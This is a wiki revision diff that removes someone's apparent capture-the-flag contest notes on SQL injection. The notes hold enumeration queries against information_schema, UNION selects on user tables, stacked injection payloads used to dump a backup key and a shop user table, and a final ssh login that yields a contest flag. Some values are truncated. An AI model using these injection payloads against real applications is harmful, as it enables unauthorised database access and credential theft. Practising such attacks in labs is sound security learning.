contest:start
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
contest:start [2016/10/20 21:39] – peter | contest:start [2020/04/15 12:03] (current) – removed peter | ||
---|---|---|---|
Line 1: | Line 1: | ||
- | ================================== | ||
- | SQL INJECTION | ||
- | |||
- | ================================== | ||
- | |||
- | select TABLE_NAME, TABLE_SCHEMA from information_schema.tables; | ||
- | |||
- | select TABLE_NAME, COLUMN_NAME from information_schema.columns; | ||
- | |||
- | select last_name, first_name from users union select 1,2; | ||
- | |||
- | select last_name, first_name from users union select version(), | ||
- | |||
- | select * from users union select 1, | ||
- | |||
- | select * from dvla.users union select TABLE_NAME, COLUMN_NAME, | ||
- | |||
- | select first_name, last_name from dvwa.users where user_id = 1; | ||
- | |||
- | username = " | ||
- | password = " | ||
- | |||
- | email address = " | ||
- | |||
- | |||
- | username = " | ||
- | |||
- | |||
- | Order number = 4 | ||
- | Name of first order = DDOSXXL | ||
- | |||
- | |||
- | db = dbm | ||
- | one table = bkeys | ||
- | |||
- | Goto shop | ||
- | |||
- | a'; select TABLE_NAME, TABLE_SCHEMA from information_schema.tables; | ||
- | |||
- | a'; select TABLE_NAME, COLUMN_NAME from information_schema.columns; | ||
- | shows bkeys table has 2 columns - id and backup_key | ||
- | |||
- | a'; select * from dbm.bkeys where id=1; | ||
- | shows backup_key = horsebatterystablecorrect | ||
- | |||
- | a'; select 1, TABLE_NAME, TABLE_SCHEMA from information_schema.tables; | ||
- | shows db=cyber with one of its table = shop_users; | ||
- | |||
- | a'; select TABLE_NAME, COLUMN_NAME from information_schema.columns; | ||
- | shows table shop_users with columns id, username, password, email, role | ||
- | |||
- | a'; select * from cyber.shop_users; | ||
- | user = " | ||
- | password=" | ||
- | |||
- | |||
- | |||
- | ssh admin@support.dbm.hl | ||
- | |||
- | Killing this host...Great job. The key is: YOUROCK | ||
- | |||
- | |||
- | |||
- | |||
- | ================================== | ||
- | |||
- | BOTNET | ||
- | |||
- | ================================== |
contest/start.1476999574.txt.gz · Last modified: 2020/07/15 09:30 (external edit)